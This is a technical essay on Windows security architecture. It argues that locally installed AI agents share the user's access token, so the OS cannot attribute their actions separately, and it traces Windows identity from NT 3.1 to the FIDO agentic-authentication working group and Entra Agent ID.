Every locally-installed AI agent on Windows in May 2026 -- Claude Desktop, ChatGPT Desktop, Cursor, GitHub Copilot CLI, the MSIX-packaged Microsoft Copilot for Windows -- runs in a process whose primary token traces to the logged-on user. `SeAccessCheck`, ETW, RPC ACLs, Defender, and on-device Conditional Access all collapse &quot;the user asked&quot; and &quot;the agent decided&quot; into one principal. The cloud-identity layer has crossed this gap: Microsoft&apos;s Entra Agent ID has been in public preview since May 19, 2025 [@ms-security-blog-agentid], and the FIDO Alliance&apos;s Agentic Authentication Technical Working Group launched its three-pillar effort on April 28, 2026 with Google&apos;s AP2 and Mastercard&apos;s Verifiable Intent as foundational donations [@fido-aatwg-pr]. The Windows OS-level analog -- a kernel-recognised `AgentPrincipal` distinct from the user SID and the package SID -- does not exist, even though the substrate primitives (AppContainer package SIDs, Kerberos S4U2Proxy, WebAuthn and Windows Hello, the TPM&apos;s Direct Anonymous Attestation, the Administrator-Protection separate-session pattern, WAM, ETW) already ship. This article maps each AATWG pillar onto the Windows primitive that already exists and the glue that does not, and argues that agent identity belongs at both layers, with the OS layer being the missing piece.
&lt;h2&gt;1. Two principals walk into a syscall&lt;/h2&gt;
&lt;p&gt;A Tuesday in May 2026. Windows 11 24H2. Claude Desktop is open. In one terminal, the user types &lt;code&gt;Remove-Item -Recurse -Force .\old-builds&lt;/code&gt;. In another, the agent decides to run the same command against the same path. &lt;code&gt;SeAccessCheck&lt;/code&gt; returns the same answer for both. The Security event log records the same &lt;code&gt;SubjectUserSid&lt;/code&gt;. &lt;a href=&quot;https://paragmali.com/blog/etw-how-windows-2000s-performance-hack-became-the-edr-substr/&quot; rel=&quot;noopener&quot;&gt;ETW&lt;/a&gt; emits the same &lt;code&gt;SubjectUserName&lt;/code&gt;. Microsoft Defender attributes both deletions to the same person -- the human at the keyboard.&lt;/p&gt;
&lt;p&gt;As far as the Windows kernel is concerned, there is exactly one principal in this story, and his name is the user [@ms-learn-sids].&lt;/p&gt;
&lt;p&gt;Nothing is broken. No malware. No zero-day. The kernel is doing exactly what NT 3.1 shipped to do on July 27, 1993 [@wiki-nt31]: read the primary token, hand the access-check engine the user SID, the group SIDs, and the integrity-level overlay [@ms-learn-mic], and decide. The decision is correct. It is also, in 2026, an attribution failure -- because the two actors who issued those two commands are different actors, and the kernel cannot tell.&lt;/p&gt;
&lt;p&gt;The attribution-collapse claim holds for every deployment pattern of every shipping agent today, but the privilege-blast-radius framing is the strong claim for Electron-wrapped agents (full DPAPI user scope, full Kerberos ticket-granting ticket, full network egress) and a more qualified claim for MSIX-packaged agents like Microsoft Copilot for Windows, which inherit a LowBox token and a per-package DPAPI scope under AppContainer [@ms-learn-appcontainer].&lt;/p&gt;

The kernel-resident access token attached to every Windows process at creation. It contains a user SID, a list of group SIDs, an integrity-level SID carried in a `SYSTEM_MANDATORY_LABEL_ACE` inside the token&apos;s SACL [@ms-learn-mic], and a privilege set; every `SeAccessCheck` call reads it as the authoritative statement of &quot;who is running this process&quot; [@ms-learn-sids].
&lt;p&gt;The collapse is structural. Three observations make the shape visible.&lt;/p&gt;
&lt;p&gt;First, the kernel&apos;s access-check pipeline reads the &lt;em&gt;user&lt;/em&gt;. &lt;code&gt;SeAccessCheck&lt;/code&gt; walks the DACL on the target object and matches each ACE against the SIDs in the primary token. The integrity-level overlay, added in Windows Vista, gates writes against the integrity label [@ms-learn-mic]; AppContainer, added in Windows 8, adds a second-principal-shaped SID to the same token group list [@ms-learn-appcontainer]; but the primary SID -- the answer the kernel returns when a downstream consumer asks &quot;whose authority is being exercised here?&quot; -- is the user.&lt;/p&gt;
&lt;p&gt;Second, the cloud-identity layer has just put the dual-principal answer on the wire. On April 28, 2026, the FIDO Alliance announced the Agentic Authentication Technical Working Group [@fido-aatwg-pr]. The three pillars: Verifiable User Instructions, Agent Authentication, and Trusted Delegation for Commerce. Chairs are CVS Health, Google, and OpenAI; vice-chairs are Amazon, Google, and Okta; the parallel Payments Technical Working Group is chaired by Mastercard and Visa. Google&apos;s Agent Payments Protocol (AP2) and Mastercard&apos;s Verifiable Intent framework are the foundational donations [@ap2-blog-google; @mastercard-vi]. Independent coverage from HelpNetSecurity dated April 29, 2026 carries the same governance roster [@helpnetsecurity-aatwg]. The cloud side now has a named, governed wire-format design space for the agent-as-distinct-principal story.&lt;/p&gt;
&lt;p&gt;Third, the OS-side gap is structural. Every layer of Windows from &lt;code&gt;SeAccessCheck&lt;/code&gt; through ETW [@ms-learn-mic] through on-device Conditional Access still answers &quot;the user&quot; because the primary token still has only the user SID. The package SID under AppContainer is the closest signal Windows has to a second principal; the access-check rule is intersection, not addition -- &quot;the permitted access is the intersection of that granted by the user/group SIDs and AppContainer SIDs&quot; [@ms-learn-appcontainer]. That intersection rule is the closest thing the kernel has to a sibling-principal model, and it identifies a &lt;em&gt;package&lt;/em&gt;, not an &lt;em&gt;agent&lt;/em&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; No engineering effort is required to produce this attribution failure. The kernel is functioning as designed. The design is from 1993. The user is the principal. The agent is the user. The audit log is what the audit log has always been.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What would it take, mechanically, for the kernel to know which principal was which -- and why has the answer been &quot;the user&quot; for the thirty-three years since NT 3.1? Both halves of that question have load-bearing histories, and those histories are older than NT itself.&lt;/p&gt;
&lt;h2&gt;2. From Multics to NT 3.1: the user-as-principal genealogy&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;MIT, Bell Labs, and General Electric. Fernando Corbato of MIT and Victor Vyssotsky of Bell Telephone Laboratories present &lt;em&gt;Introduction and Overview of the Multics System&lt;/em&gt; at the AFIPS Fall Joint Computer Conference. Their opening describes a general-purpose programming system intended to scale to thousands of users at a single installation [@multics-fjcc]. Multics, jointly led by MIT&apos;s Project MAC, General Electric, and Bell Laboratories [@multics-wiki], is the first operating system designed from the start around the idea that the kernel must know &lt;em&gt;whose&lt;/em&gt; work each running process is doing.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The Multics inheritance is not stylistic. It is the source of the abstraction Windows NT 3.1 picks up twenty-eight years later: a &lt;em&gt;principal&lt;/em&gt; is a named entity (a user, or in some systems a service account); every process belongs to exactly one principal at creation; the kernel mediates access using that principal. TENEX, BBN&apos;s PDP-10 time-sharing system from 1969 [@tenex-bitsavers], inherits the same model and ports it into the DEC product line; the Multics-to-TENEX-to-Unix lineage [@multics-hist] is the route the article reads as carrying the user-as-principal assumption forward into the design ground from which DEC VMS and later Windows NT 3.1 emerged.&lt;/p&gt;

A variable-length data structure that uniquely identifies a security principal in a Windows access decision. The canonical user-SID form is `S-1-5-21--`; every access token carries a user SID plus a list of group SIDs, and every `SeAccessCheck` call reads them as the authoritative answer to &quot;who is running this thread?&quot; [@ms-learn-sids].
&lt;p&gt;The formal model came in 1971. Butler Lampson, then at Xerox Palo Alto, published &lt;em&gt;Protection&lt;/em&gt; at the 5th Princeton Conference on Information Sciences and Systems, later reprinted in ACM Operating Systems Review 8(1) in January 1974 [@lampson-catalog]. Lampson&apos;s access-matrix model -- subject by object by right -- is the operational mathematics behind every modern access-control system. Read the matrix row by row and you get a capability list (&quot;what each subject can do&quot;); read it column by column and you get an access control list (&quot;who can do what to this object&quot;). Windows picks column-major: every securable object on Windows is described by a DACL, and &lt;code&gt;SeAccessCheck&lt;/code&gt; is the operational realisation of Lampson&apos;s matrix on NT. The DACL is the column; the primary token is the row index; the access-check answer is the cell.&lt;/p&gt;
&lt;p&gt;The bwlampson.site author catalog is the canonical fetchable anchor for the 1971 paper [@lampson-catalog]. The Microsoft Research-hosted PDF that this corpus previously linked is dead (HTTP 404); the catalog page itself names the ACM OSR 8(1) January 1974 reprint as the journal of record.&lt;/p&gt;

timeline
    title Genealogy of the user-as-principal model
    1965 : Multics
         : Corbato and Vyssotsky present at AFIPS FJCC
         : Per-user authentication as a kernel primitive
    1969 : TENEX
         : BBN ports the user-as-principal model to PDP-10
    1971 : Lampson&apos;s access-matrix model
         : Subject x object x right
         : Foundation for SeAccessCheck and the DACL
    1988 : Hardy&apos;s Confused Deputy
         : Authority from two sources, no way to name which
    1993 : NT 3.1 ships
         : One primary token per process, user SID as principal
&lt;p&gt;Seventeen years later, in 1988, Norm Hardy writes &lt;em&gt;The Confused Deputy&lt;/em&gt; at Key Logic (the company formed from the wreckage of Tymshare, where the events Hardy describes had occurred years earlier). Hardy&apos;s compiler is a FORTRAN compiler with a home-files licence; it legitimately holds authority to write into one path (the billing file &lt;code&gt;(SYSX)BILL&lt;/code&gt;) so it can record per-user compilation charges, and it legitimately accepts user-supplied output paths so it can write generated &lt;code&gt;.obj&lt;/code&gt; files where the user requests. A clever user supplies &lt;code&gt;(SYSX)BILL&lt;/code&gt; as the output path. The compiler obediently writes the user&apos;s output over the billing record, because the compiler &quot;had no way of expressing these intents&quot; [@hardy-caplore].&lt;/p&gt;
&lt;p&gt;Hardy&apos;s punchline is structural, and the article will return to it once more. &quot;The fundamental problem is that the compiler runs with authority stemming from two sources. (That&apos;s why the compiler is a confused deputy.) ... The compiler had no way of expressing these intents!&quot; [@hardy-caplore]. The deputy holds authority from two principals (itself, the licensed compiler; and the user it is serving), and the system the deputy talks to has no protocol for the deputy to say &lt;em&gt;which&lt;/em&gt; authority it is exercising for &lt;em&gt;this&lt;/em&gt; action. Any system that grants a deputy ambient authority from multiple sources without giving the deputy a way to name those sources at the syscall is a confused-deputy system by construction. The ACM Digital Library carries the canonical reprint at &lt;code&gt;10.1145/54289.871709&lt;/code&gt; [@hardy-acm], with the cap-lore.com mirror as the fetchable secondary.&lt;/p&gt;

Hardy 1988: a process holding authority delegated from one principal can be tricked into using that authority on behalf of another principal because the process has no way to attribute its actions to the right authorising principal at the syscall [@hardy-caplore]. The structural lower bound on agent attribution.
&lt;p&gt;July 27, 1993 [@wiki-nt31]. Dave Cutler ships NT 3.1. Every process on NT carries exactly one primary token; the token&apos;s user SID is the principal; impersonation is the only way a thread can temporarily speak as a different identity, and impersonation is bounded to the thread, not the process. Microsoft Learn states the consequence verbatim: &quot;Each time a user signs in, the system creates an access token for that user. The access token contains the user&apos;s SID, user rights, and the SIDs for any groups the user belongs to&quot; [@ms-learn-sids]. That description is the Multics inheritance with thirty years of refinement: one principal per process, the principal is a user, the access-check is the operational form of Lampson&apos;s matrix.&lt;/p&gt;
&lt;p&gt;This is the &lt;em&gt;user-identity&lt;/em&gt; milestone, not the code-identity milestone. NT 3.1 made user identity precise. The process that ran an attached binary still had no answer to &quot;who is this &lt;em&gt;code&lt;/em&gt;?&quot; -- and as the late-1990s ActiveX download experience would prove, that gap could not stay open.&lt;/p&gt;
&lt;h2&gt;3. Layering code identity on user identity: 1996 to 2017&lt;/h2&gt;
&lt;p&gt;August 7, 1996. A joint Microsoft and VeriSign press release crosses the wire: &lt;em&gt;Microsoft and VeriSign Provide First Technology For Secure Downloading of Software Over the Internet&lt;/em&gt; [@ms-news-authenticode-1996]. Internet Explorer 3.0 will ship with the new model the same year. The model has a name: Authenticode. The question this section asks: did Authenticode and its successors solve the principal question, or did they only decorate it?&lt;/p&gt;
&lt;p&gt;The pattern that emerges across five generations of &lt;a href=&quot;https://paragmali.com/blog/windows-app-identity-33-year-reinvention/&quot; rel=&quot;noopener&quot;&gt;code-identity layering&lt;/a&gt; deserves a name. Every generation answers a real failure of the one before it. Every generation adds an attribute to the access decision -- a publisher signature on the binary, a policy gate at load time, a second SID in the token, a kernel-mode code-integrity policy. And every generation leaves the runtime principal unchanged. The user is still the user. The token&apos;s primary SID is still the user SID. The downstream consumer (Defender, an ETW provider, a remote RPC server, a file-system DACL) still sees one principal.&lt;/p&gt;
&lt;h3&gt;3.1 Authenticode (1996, NT 4.0 with IE 3.0)&lt;/h3&gt;
&lt;p&gt;Authenticode is a load-time attribute. The publisher signs the PE on disk; the signature is a PKCS #7 blob embedded in a dedicated PE attribute certificate slot [@ms-learn-cryptography]. When the loader maps the binary, Windows can verify the signature, walk the certificate chain to a trusted root, and present the publisher name to the user (in IE 3.0&apos;s case, in the famous ActiveX install dialog). Cross-vendor code-signing history places Authenticode among the earliest widely-deployed commercial schemes to bind a publisher identity to a downloaded executable [@wikipedia-codesign; @ms-news-authenticode-1996].&lt;/p&gt;
&lt;p&gt;Authenticode is a &lt;em&gt;load-time&lt;/em&gt; attribute -- the publisher signs the file on disk, not the running process. After the loader has validated the signature and mapped the image, the running process&apos;s primary token has nothing in it that records &quot;this binary was signed by Microsoft Corporation.&quot; The runtime principal is unchanged from what the user&apos;s logon session created.&lt;/p&gt;
&lt;p&gt;The failure mode that forces the next generation is structural. A signature is descriptive (&quot;this file is from Microsoft&quot;), not authoritative (&quot;this process is acting with Microsoft&apos;s authority&quot;). A binary&apos;s publisher is attached to the file on disk; nothing about it propagates into the access decision the kernel makes when the process opens a network socket, decrypts a DPAPI blob, or impersonates over RPC.&lt;/p&gt;
&lt;h3&gt;3.2 SRP and AppLocker (2001, 2009)&lt;/h3&gt;
&lt;p&gt;Software Restriction Policies arrived first with Windows XP (October 2001) [@wiki-winxp] and shipped again with Windows Server 2003 (April 2003) [@wiki-srv2003]; AppLocker arrived on Windows 7 (October 22, 2009) [@wiki-win7] and Server 2008 R2 as the formal successor. Microsoft Learn says it directly: &quot;AppLocker policies in the GPO are applied and supersede the SRP policies in the GPO and any local AppLocker policies or SRP policies&quot; [@ms-learn-srp-applocker]. Both layers are policy gates: an administrator authors rules naming publishers, hashes, or paths, and the OS enforces the rules at process creation. The runtime token is, again, unchanged.&lt;/p&gt;
&lt;p&gt;The failure mode is one Microsoft itself documents in unusually plain language. The AppLocker overview reads, verbatim: &quot;AppLocker is a defense-in-depth security feature and not considered a defensible Windows security feature&quot; [@ms-learn-applocker]. The same page directs administrators to App Control for Business when the goal is defensible threat protection. Defense-in-depth means the feature raises attacker cost; it does not promise an attacker cannot bypass it. That promise is reserved for documented security boundaries.&lt;/p&gt;
&lt;h3&gt;3.3 AppContainer and the package SID (Windows 8, October 26, 2012 general availability)&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://paragmali.com/blog/appcontainer-and-lowbox-tokens-windowss-capability-sandbox/&quot; rel=&quot;noopener&quot;&gt;AppContainer&lt;/a&gt; is the first time the kernel carries a &lt;em&gt;second&lt;/em&gt; principal-shaped SID in the token&apos;s group list. Windows 8 ships with the new sandbox; every UWP app process runs with an &lt;code&gt;S-1-15-2-...&lt;/code&gt; package SID attached to its primary token, alongside the user SID and the user&apos;s group SIDs. The dual-principal model has a verbatim Microsoft Learn definition: &quot;This dual-principal model ensures that access to sensitive resources is tightly controlled and can be managed independently for different applications ... the permitted access is the intersection of that granted by the user/group SIDs and AppContainer SIDs&quot; [@ms-learn-appcontainer].&lt;/p&gt;

The kernel sandboxing primitive shipped in Windows 8 (October 26, 2012 general availability) [@ms-learn-appcontainer; @wiki-win8]. It attaches a second SID (`S-1-15-2-...`) to a process&apos;s access token; access decisions become the intersection of user/group SIDs and the package SID, gated further by capability SIDs (`S-1-15-3-...`) the app declares in its manifest [@ms-learn-appcontainer]. The kernel-internal name for the structure is the LowBox token, which is why the relevant API is `NtCreateLowBoxToken` [@ms-learn-appcontainer-legacy].
&lt;p&gt;The dual-principal language is real and load-bearing. It is also not what the article needs. The package SID identifies a &lt;em&gt;package&lt;/em&gt; (the UWP manifest, the MSIX bundle), not an &lt;em&gt;agent role&lt;/em&gt;. Nothing upstream tells Defender, ETW, or Conditional Access whether the package SID it sees represents an AI agent, a UWP calculator, or a games launcher. AppContainer also originally targeted UWP only; the legacy-applications variant arrived later as a way to retrofit unpackaged Win32 apps into the same kernel substrate [@ms-learn-appcontainer-legacy], which is the path Win32 App Isolation (June 14, 2023) extends [@ms-blogs-win32appiso].&lt;/p&gt;
&lt;h3&gt;3.4 App Control for Business (2017 onwards)&lt;/h3&gt;
&lt;p&gt;App Control for Business -- the policy formerly known as Windows Defender Application Control (WDAC), which arrived as a named feature in Windows 10 1709 (Fall Creators Update, released October 17, 2017) [@wiki-win10vh] -- is the kernel-mode code-integrity policy enforced by the loader itself [@ms-learn-appcontrol]. Unlike AppLocker, App Control for Business is on the documented security-boundary list when configured per the supported guidance; it can cover DLL loads, driver loads, and script-host loads with a single policy. The runtime principal is, predictably, still the user.&lt;/p&gt;

flowchart TD
    subgraph TokenAtRuntime[&quot;What is in the primary token&quot;]
        US[&quot;User SID (1993)&quot;]
        PSID[&quot;Package SID (2012)&quot;]
        IL[&quot;Integrity level overlay (2006)&quot;]
    end
    subgraph GateBeforeRuntime[&quot;What gates execution before the token exists&quot;]
        AC[&quot;Authenticode signature (1996)&quot;]
        SRP[&quot;SRP and AppLocker (2001 and 2009)&quot;]
        WDAC[&quot;App Control for Business (2017)&quot;]
    end
    AC --&amp;gt; SRP --&amp;gt; WDAC
    US --&amp;gt; PSID --&amp;gt; IL
    GateBeforeRuntime -.-&amp;gt; TokenAtRuntime
    classDef def fill:transparent
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Each generation of Windows code identity pushed the publisher, package, or integrity attribute into the token or into a load-time gate, but the runtime principal stayed the user. The agent-attribution problem is the third instance of this pattern -- the question shifts from &quot;who wrote this code?&quot; to &quot;who instructed this code right now?&quot; but the architectural answer Windows has shipped is the same answer it shipped in 1993.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So a reader who arrived at this article believing Windows must have some way of attributing what an AI agent does, given how much identity machinery has accumulated since 1993, can now see why the belief is wrong. Authenticode signs the file on disk. AppLocker is defense-in-depth. The AppContainer package SID is per-package, not per-role. App Control for Business controls what code runs, not which principal carries the authority once code is loaded. Five generations of layering identity attributes; one user SID at the centre.&lt;/p&gt;
&lt;p&gt;If we take the genealogy seriously and ask what a sixth generation -- a &lt;em&gt;second principal&lt;/em&gt; attached to the process at the kernel layer -- would have to look like, the answer is sitting in an Insider build.&lt;/p&gt;
&lt;h2&gt;4. Six generations, plus the one that hasn&apos;t shipped&lt;/h2&gt;
&lt;p&gt;Read the genealogy as a forcing function and the shape becomes clear. Every generation of Windows app identity was forced by a specific failure of the one before it, and the forced response was never &quot;replace the existing identity model&quot; -- it was always &quot;add an attribute or a sibling principal alongside it.&quot; That conservation rule is what makes Windows identity legible across thirty-three years. It is also what makes the seventh generation visible by its absence.&lt;/p&gt;
&lt;p&gt;The six shipped generations are easy to enumerate.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Generation 1: NT 3.1 primary token (July 27, 1993).&lt;/strong&gt; One primary token per process. The token carries a user SID and a group SID list [@ms-learn-sids; @wiki-nt31]. The runtime principal is the user.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Generation 2: Authenticode (August 7, 1996).&lt;/strong&gt; Publisher signature attached to the binary on disk [@ms-news-authenticode-1996]. Runtime token unchanged.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Generation 3: SRP, then AppLocker (2001, October 22, 2009).&lt;/strong&gt; Group-Policy execution gates; runtime token unchanged; AppLocker explicitly defense-in-depth, not a defensible boundary [@ms-learn-applocker; @ms-learn-srp-applocker; @wiki-winxp; @wiki-win7].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Generation 4: AppContainer and the package SID (October 26, 2012).&lt;/strong&gt; Second principal-shaped SID in the token group list. Access check is the intersection of user and package authority [@ms-learn-appcontainer; @wiki-win8]. Runtime principal is still the user.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Generation 5: App Control for Business (2017 onwards).&lt;/strong&gt; Kernel-mode code-integrity policy; defensible boundary; controls what code can run, not which principal carries authority [@ms-learn-appcontrol; @wiki-win10vh].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Generation 6: Administrator Protection (late 2025 Insider, iterating through 2026).&lt;/strong&gt; The first shipping Windows feature that mints a true second logon-session principal for a bounded action, gated by a Windows Hello user-verification gesture [@ms-techcomm-adminprot].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href=&quot;https://paragmali.com/blog/adminless-how-windows-finally-made-elevation-a-security-boun/&quot; rel=&quot;noopener&quot;&gt;Administrator Protection&lt;/a&gt; is the interesting one. The feature surfaced on Windows 11 Insider builds in late 2025; subsequent Insider build iterations have continued through 2026, with a temporary disablement and re-enablement during that window [@ms-techcomm-adminprot]. As of May 2026 it is not yet generally available; the Tech Community announcement page is the canonical reference for the design [@ms-techcomm-adminprot].&lt;/p&gt;
&lt;p&gt;The structural innovation is worth describing precisely. Pre-Administrator-Protection elevation on Windows used split tokens: an administrator user signs in, and the Local Security Authority creates two logon sessions for the same user, one filtered and one full. When the user clicks through the User Account Control prompt, the elevating process swaps its primary token from the filtered to the full session. Both sessions belong to the same user SID; the policy boundary is integrity-level and group-driven, not principal-driven.&lt;/p&gt;
&lt;p&gt;Administrator Protection breaks that. The feature introduces a &lt;em&gt;System-Managed Administrator Account&lt;/em&gt; shadow profile.The internal acronym is SMAA. It does not yet appear in &lt;code&gt;whoami /all&lt;/code&gt; output on shipping builds. When the user authorises an elevation through Windows Hello, the elevated process runs under the separate SMAA logon session, scoped to that elevation [@ms-techcomm-adminprot]. The Hello gesture is the verification step; the separate session is the new principal; the bound is the single elevated action.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Every generation of Windows app identity has been forced by a specific failure of the previous generation, and every forced response added an attribute or a sibling principal alongside the existing one -- but until Administrator Protection (Generation 6, Insider in 2026, not yet generally available), no shipping Windows feature minted a true second principal for a bounded action.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Administrator Protection is the existence proof. Windows &lt;em&gt;can&lt;/em&gt; mint a second logon-session principal for a bounded action under a user-verification gesture. The architectural question this article asks: can the same pattern generalise from elevation to delegation?&lt;/p&gt;

flowchart TD
    G1[&quot;Gen 1: NT 3.1 primary token (1993). User SID only.&quot;]
    G2[&quot;Gen 2: Authenticode (1996). Publisher attached to binary.&quot;]
    G3[&quot;Gen 3: SRP and AppLocker (2001, 2009). Execution gates.&quot;]
    G4[&quot;Gen 4: AppContainer and package SID (2012). Second SID in token.&quot;]
    G5[&quot;Gen 5: App Control for Business (2017+). Kernel-mode CI.&quot;]
    G6[&quot;Gen 6: Administrator Protection (late 2025 Insider). Second logon session for elevation.&quot;]
    G7[&quot;Gen 7 (missing): AgentPrincipal. Second logon session for delegation.&quot;]
    G1 --&amp;gt; G2 --&amp;gt; G3 --&amp;gt; G4 --&amp;gt; G5 --&amp;gt; G6 -.-&amp;gt; G7
&lt;p&gt;The missing seventh generation is what this article is about. It exists at the cloud layer. Microsoft&apos;s Entra Agent ID has been in public preview since May 19, 2025 [@ms-security-blog-agentid] and was the centrepiece of the Ignite 2025 expansion that Microsoft itself called &quot;the largest expansion of Microsoft Entra capabilities to date, extending Zero Trust principles to AI workloads&quot; [@ms-learn-ignite25]. The FIDO Alliance has named the wire-format design space [@fido-aatwg-pr]. The IETF has an individual draft for the OAuth wire format [@ietf-draft-agentoauth]. The OS layer does not have an analog.&lt;/p&gt;
&lt;p&gt;If Generation 6 is the existence proof at the OS layer, what just happened at the cloud layer that finally makes the delegation case unavoidable?&lt;/p&gt;
&lt;h2&gt;5. April 28, 2026: the wire format goes public&lt;/h2&gt;
&lt;p&gt;April 28, 2026. The FIDO Alliance press release crosses the wire. &lt;em&gt;FIDO Alliance to Develop Standards for Trusted AI Agent Interactions&lt;/em&gt; [@fido-aatwg-pr]. The opening sentence is the inflection point: &quot;The FIDO Alliance today announced initiatives to develop interoperable standards for agentic interactions and commerce.&quot; Andrew Shikiar, FIDO Alliance CEO, is the launch spokesperson. The BusinessWire mirror under wire ID &lt;code&gt;20260427506015&lt;/code&gt; carries the same text [@fido-aatwg-bw], and independent press coverage from HelpNetSecurity (April 29, 2026) [@helpnetsecurity-aatwg] and PPC Land [@ppcland-aatwg] corroborate the launch.&lt;/p&gt;
&lt;p&gt;Four interlocking pieces of news land in the same press release.&lt;/p&gt;
&lt;h3&gt;5.1 The three AATWG pillars&lt;/h3&gt;
&lt;p&gt;The Agentic Authentication Technical Working Group is chartered around three pillars [@fido-aatwg-pr]. The press release wording is verbatim because the wording is what every downstream protocol will quote.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Verifiable User Instructions.&lt;/strong&gt; &quot;Enabling users to authorise AI agents through clear, phishing-resistant mechanisms so agents only perform approved actions, including transactions, without exposing credentials&quot; [@fido-aatwg-pr]. The wire-format primitive: a passkey-signed delegation token bound to a specific intent (&quot;approve $50 to vendor X&quot;), with replay protection and a short TTL.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Agent Authentication.&lt;/strong&gt; &quot;Allowing services to verify that an AI agent is acting on behalf of an authenticated user and within defined parameters, distinguishing legitimate agents from unauthorised actors&quot; [@fido-aatwg-pr]. The wire-format primitive: an attestation binding an agent class (optionally a specific instance) to a verifiable identity assertion.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Trusted Delegation for Commerce.&lt;/strong&gt; &quot;Defining how agent-initiated transactions can be executed within user-controlled boundaries, with verifiable authorisation&quot; [@fido-aatwg-pr]. The wire-format primitive: the AP2 mandate or Verifiable Intent SD-JWT chain binding an agent action to a user-approved scope and constraint set.&lt;/li&gt;
&lt;/ul&gt;

The FIDO Alliance today announced initiatives to develop interoperable standards for agentic interactions and commerce ... Verifiable User Instructions ... Agent Authentication ... Trusted Delegation for Commerce. -- FIDO Alliance press release, April 28, 2026 [@fido-aatwg-pr]
&lt;h3&gt;5.2 The governance&lt;/h3&gt;
&lt;p&gt;The taxonomy matters because over-attribution is one of the easier mistakes to make in this story. AATWG chairs are CVS Health, Google, and OpenAI; vice-chairs are Amazon, Google, and Okta; the parallel Payments Technical Working Group is chaired by Mastercard and Visa [@fido-aatwg-pr]. Co-sponsors include OpenAI, Amazon, Okta, CVS Health, Visa, and Proof, plus the donating partners (Google, Mastercard). Proof Inc.&apos;s &lt;em&gt;Know Your Agent&lt;/em&gt; framework is a separate Sponsor-tier contribution to FIDO; it is not an AATWG chair or vice-chair role.&lt;/p&gt;
&lt;h3&gt;5.3 The foundational donations&lt;/h3&gt;
&lt;p&gt;Google&apos;s Agent Payments Protocol (AP2) and Mastercard&apos;s Verifiable Intent framework are the foundational donations [@ap2-blog-google; @mastercard-vi]. AP2 was open-sourced on September 16, 2025 [@ap2-cloud-blog] at &lt;code&gt;github.com/google-agentic-commerce/AP2&lt;/code&gt; under Apache 2.0 [@ap2-github]; v0.2 shipped alongside the FIDO donation, with the v0.2 release notes calling out &quot;Human Not Present&quot; payments [@ap2-blog-google]. Mastercard&apos;s Verifiable Intent specification is hosted at verifiableintent.dev as Draft v0.1, describing a three-layer SD-JWT delegation chain (Identity, Intent, Action) with eight constraint types -- amount bounds, merchant allow-lists, budget caps, recurrence terms -- &quot;cryptographically bound and machine-verifiable&quot; [@vi-dev]. The underlying credential model is the W3C Verifiable Credentials Data Model v2.0 W3C Recommendation [@w3c-vc-2].&lt;/p&gt;
&lt;p&gt;The mandate vocabulary drifted between the September 2025 AP2 launch and the v0.2 release. The launch announcement at cloud.google.com described &quot;Intent / Cart / Payment&quot; mandates [@ap2-cloud-blog]; the current ap2-protocol.org spec describes &quot;Checkout (Open / Closed) + Payment (Open / Closed)&quot; [@ap2-protocol]. Readers diffing the September 2025 blog against the April 2026 spec should expect the vocabulary, not the underlying primitives, to have changed.&lt;/p&gt;
&lt;h3&gt;5.4 The Microsoft parallel&lt;/h3&gt;
&lt;p&gt;Microsoft has been on the same arc for nearly a year. The Build 2025 security blog, dated May 19, 2025, introduced Microsoft Entra Agent ID in public preview: &quot;We are excited to introduce Microsoft Entra Agent ID, which extends identity management and access capabilities to AI agents&quot; [@ms-security-blog-agentid]. The Workday Agent System of Record and ServiceNow AI Platform integrations announced on September 16, 2025 made Entra Agent ID a directory service for agents across two of the largest enterprise SaaS platforms [@prnewswire-workday]. The Ignite 2025 expansion (November 2025) was, in Microsoft&apos;s own framing, &quot;the largest expansion of Microsoft Entra capabilities to date, extending Zero Trust principles to AI workloads&quot; [@ms-learn-ignite25]; the agent OAuth protocol trio shipped at the same time [@ms-learn-agentoauth], and Conditional Access for agent identities followed into preview in early 2026 [@ms-learn-caagent]. WinBuzzer (May 20, 2025) corroborates the public-preview launch [@winbuzzer-agentid].&lt;/p&gt;

flowchart LR
    P1[&quot;Pillar 1: Verifiable User Instructions&quot;]
    P2[&quot;Pillar 2: Agent Authentication&quot;]
    P3[&quot;Pillar 3: Trusted Delegation for Commerce&quot;]
    W1[&quot;Wire: passkey-signed delegation token, intent-bound, short TTL&quot;]
    W2[&quot;Wire: attestation + identity assertion, agent class or instance&quot;]
    W3[&quot;Wire: AP2 mandate or Verifiable Intent SD-JWT chain&quot;]
    P1 --&amp;gt; W1
    P2 --&amp;gt; W2
    P3 --&amp;gt; W3
&lt;p&gt;So the reader&apos;s understanding shifts. Before April 28, 2026 the easy mental model was that AI agents were a product feature, not an identity question. After the FIDO press release the design space is named, governed, and partially specified on the wire. The further shift drives the rest of the article: &lt;em&gt;the cloud layer is no longer the gap&lt;/em&gt;. Entra Agent ID has shipped a directory; OAuth Token Exchange has had the &lt;code&gt;act&lt;/code&gt; and &lt;code&gt;may_act&lt;/code&gt; claims standardised since January 2020 [@ietf-rfc-8693]; the MCP authorisation profile has its 2025-11-25 revision live [@anthropic-mcp-2025-11-25]; AP2 and Verifiable Intent are now under FIDO governance.&lt;/p&gt;
&lt;p&gt;The gap is on the desktop. So if we take the three pillars seriously, which Windows primitive does each pillar already have a substrate for, and which Windows primitive is missing?&lt;/p&gt;
